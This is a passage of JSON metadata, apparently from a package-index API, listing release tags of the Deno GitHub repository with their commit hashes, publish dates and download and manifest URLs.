1:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_u